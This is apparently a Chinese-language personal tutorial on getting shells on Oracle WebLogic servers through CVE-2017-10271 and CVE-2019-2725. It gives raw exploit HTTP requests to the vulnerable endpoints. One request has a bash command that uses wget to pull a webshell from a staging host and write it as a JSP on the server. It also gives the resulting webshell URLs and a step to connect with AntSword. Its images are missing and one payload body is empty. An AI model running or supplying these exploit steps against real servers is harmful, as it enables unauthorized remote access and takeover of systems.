Weblogic Getshell教程

文章介绍Weblogic CVE-2017-10271和Weblogic CVE-2019-2725漏洞Getshell教程

本着能看懂就行的原则，所以部分图片因作者懒是网上找的（会有标记），能看懂就行，一切都是为了怕忘，故写成文章记录下来。

Weblogic CVE-2017-10271

批量扫描

网图

命令执行

网图

Getshell

payload

可能会因为缩进或者换行原因导致payload出现问题可以找作者要txt文件

POST /wls-wsat/CoordinatorPortType HTTP/1.1

Host: 192.168.43.4:7001

Accept-Encoding: gzip, deflate

Accept: */*

Accept-Language: en

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)

Connection: close

Content-Type: text/xml

Content-Length: 9559

   

   

   

   

   

   

   

---

过程

Burp抓包后全部payload内容黏贴到请求包只改IP和端口    

上传

Shell地址

http://192.168.43.4:7001/bea_wls_internal/test.jsp

验证

蚁剑连接

Weblogic CVE-2019-2725

批量扫描

网图

命令执行

这回不命令执行了直接Getshell（网图没找到！！！）

Getshell

Payload

POST /_async/AsyncResponseService HTTP/1.1

Host: 192.168.43.4:7001

Content-Length: 880

Accept-Encoding: gzip, deflate

SOAPAction:

Accept: */*

User-Agent: Apache-HttpClient/4.1.1 (java 1.5)

Connection: keep-alive

content-type: text/xml

 

xx

xx

/bin/bash

-c

wget http://192.168.43.4:7001/bea_wls_internal/webshell.txt -O servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/webshell.jsp

---

过程

这里用到远程下载木马，需要先找个可以上传txt文件的地方，一般很容易，能访问就行，如下图

跳板机

如下可见在调用webshell.txt后直接生成webshell.jsp文件，weget地址需要根据自身情况更改

wgethttp://192.168.43.4:7001/bea_wls_internal/webshell.txt-O servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/webshell.jsp

修改目标IP、端口、payload部分内容如下图

上传

Shell地址

http://192.168.43.4:7001/_async/webshell.jsp

验证

蚁剑连接